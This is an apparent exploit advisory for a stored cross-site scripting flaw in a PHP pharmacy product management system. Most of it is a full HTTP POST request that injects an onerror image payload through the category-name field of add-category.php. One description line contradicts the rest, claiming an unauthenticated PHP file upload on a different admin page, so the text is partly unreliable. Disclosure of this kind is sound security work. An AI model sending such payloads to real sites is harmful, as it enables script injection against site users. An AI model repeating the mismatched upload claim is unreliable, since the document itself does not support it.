# Exploit Title: Pharmacy Product Management System - Persistent XSS
# Date: 25.08.2025
# Exploit Author: Ömer Ahmet Yılmaz
# Vendor Homepage: https://www.sourcecodester.com/php/17883/web-based-product-alert-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=17883&title=Web-based+Pharmacy+Product+Management+System+using+PHP+and+MySQL+Database
# Version: 1.0
# Tested on: Linux

## Unauthenticated users can access /Admin/add-admin.php address and they can upload malicious php file by changing Content-Type to image/jpeg instead of profile picture image without any authentication. 

POST /product_expiry/add-category.php HTTP/1.1
Host: myapp.local:8080
Content-Length: 73
Cache-Control: max-age=0
Origin: http://myapp.local:8080
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Sec-GPC: 1
Accept-Language: en-US,en;q=0.5
Referer: http://myapp.local:8080/product_expiry/add-category.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=3dj1ghq482uh0diebcjt4d1l3q
Connection: keep-alive

txtcategory_name=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%281%29%3E&btnsave=

# After sending a POST request with a malicious payload, the code is stored in the database and will be triggered every time the affected page is reloaded, resulting in a persistent (stored) XSS vulnerability.